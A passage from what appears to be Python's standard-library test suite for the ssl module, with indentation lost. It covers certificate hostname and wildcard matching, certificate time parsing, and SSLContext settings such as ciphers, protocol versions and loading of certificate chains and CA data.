cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry in subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denial of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# an unconnected socket should return None for a known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# The OpenSSL default is MINIMUM_SUPPORTED; however, some vendors
# (e.g. Fedora) override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows levels between 0 and 5.
# OpenSSL defaults to 1, but some vendors override the default
# value (e.g. Debian defaults to 2).
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# combinations of flags are supported as well
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: this used to crash when the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
